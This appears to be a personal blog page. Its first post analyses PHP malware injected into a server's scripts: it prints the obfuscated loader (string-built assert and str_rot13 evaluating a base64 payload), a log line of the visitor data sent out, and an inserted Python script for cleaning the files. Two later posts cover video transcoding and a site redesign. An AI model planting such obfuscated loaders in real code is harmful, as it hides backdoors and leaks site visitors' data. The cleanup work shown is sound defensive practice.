Battle against injected PHP

My main personal web server became infected with some effin malware that was injected into very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me; it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other PHP script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example Apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.
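
An added example, not the author's searchAndDestroy script: one way to find and strip the block between the two marker comments shown above from every .php file under a directory. The function names, the dry-run default and the `.infected` backup suffix are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Marker comments taken from the injected block shown on this page.
START = b"//###=CACHE START=###"
END = b"//###=CACHE END=###"
# Non-greedy match from a START marker to the next END marker, plus the line ending.
BLOCK = re.compile(re.escape(START) + rb".*?" + re.escape(END) + rb"[ \t]*\r?\n?",
                   re.DOTALL)

def strip_injection(data: bytes):
    """Return (cleaned_bytes, number_of_marker_blocks_removed)."""
    return BLOCK.subn(b"", data)

def scan_tree(root, apply=False):
    """Check every *.php file under root; return {path: status}.

    Status is "would-clean" (dry run), "cleaned" (apply=True), or
    "manual-review" when a marker remains without its partner.
    """
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        if not path.is_file():
            continue
        original = path.read_bytes()  # bytes: keep encoding and newlines intact
        cleaned, removed = strip_injection(original)
        if START in cleaned or END in cleaned:
            # Unpaired marker: the block is damaged or altered, do not guess.
            report[str(path)] = "manual-review"
        elif removed:
            if apply:
                # Keep the infected original for later analysis (hypothetical suffix).
                Path(str(path) + ".infected").write_bytes(original)
                path.write_bytes(cleaned)
            report[str(path)] = "cleaned" if apply else "would-clean"
    return report

if __name__ == "__main__":
    # Usage: python strip_cache_block.py /var/www [--apply]
    for name, status in scan_tree(sys.argv[1], "--apply" in sys.argv).items():
        print(f"{status:14} {name}")
```

Stripping the block does not close whatever allowed the files to be written in the first place, so a clean scan is only the start of the cleanup. Move the `.infected` copies out of the web root once they have been reviewed.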

MediaDrop Automatic Transcoding Script

I’ve been working on a somewhat private personal website intended for sharing of family videos. I’ve converted roughly 200 hrs of old family video tapes into media files and am well on my way to having converted the files into individual scenes/clips. The content is being shared, with family, using an instance of the web application “MediaDrop”. I love this web application. It’s epic. I was just looking for a podcast feed generator and I found a lot more in MediaDrop.

I then got sort of obsessed with this cool web app and eventually with having family members upload their own videos. The problem was I needed the format of the content to be normalized such that it’ll cooperate over the podcast feed. After all, these are meant to be easily viewed on Apple TVs. I found a script for this job, as MediaDrop doesn’t transcode. Only the script kind of sucked for my purposes. So I forked it!

Check out my first GitHub project here: https://github.com/docdawning/mediadrop-handbrake-bot

It automatically transcodes uploaded videos to MP4 files, compatible with Apple TV3 devices.

Dawning.ca Spruced Up

Previous Dawning.ca Layout

I’ve just spent a few hours re-designing the layout of Dawning.ca. The old one served me very well and I really liked it. I had heavily modified the previous theme to work for me and work it did. I may tap it some time in the future as a backup… As you can see to the right, the new style is fairly different compared to the image, although I kept the workflow as I think it was already pretty good.

Objectives

Basically, I was trying to get the site to be:

  • Simple to use
  • Uncluttered
  • Attractive
  • Professional & Casual
  • Technically Interesting
  • Simple to use
  • Did I mention, simple to use?

I feel I accomplished these goals, though I felt I had to sacrifice some technically interesting features in order to reduce the clutter. I had made some cool logos a while ago that looked good on the more cartoony past version of the site, but they looked horrible here. I ultimately decided to just get rid of the top banner altogether; I don’t think people need to keep being reminded of what site they’re on. Anyway, comment below eh!?

Technical Blah

I’m using a few CSS tricks I’ve learned in the last while to round corners, shade and pretty things up. Mainly, for rounded corners I use tricks such as those found here.

In terms of the shading, if you look carefully at my setup, the black gradient on the red background is made from a 1 x 200 px PNG image file overlaid on a red background. The CSS for that trick looks like this:

background-image: url('/media/bkgd.png');
background-repeat: repeat-x;

Most shaded regions are made using repeated 10 x 10 px images that are very transparent PNG images. I use CSS nearly identical to that above for this too; the only difference is that the repeat statement has no -x to it.

I built up the new theme using the very famous and helpful Atahualpa theme. I’ve used this theme for various WordPress websites of mine including those for:

Also, my buddy Devin, who I recently helped get his first Apache/MySQL/PHP/WordPress server install going, is using the Atahualpa Theme for his website. It truly is a great WordPress theme for both advanced users and beginners alike.

Your Turn

What do you all think of my redesign? Any suggestions? What WordPress theme do you use?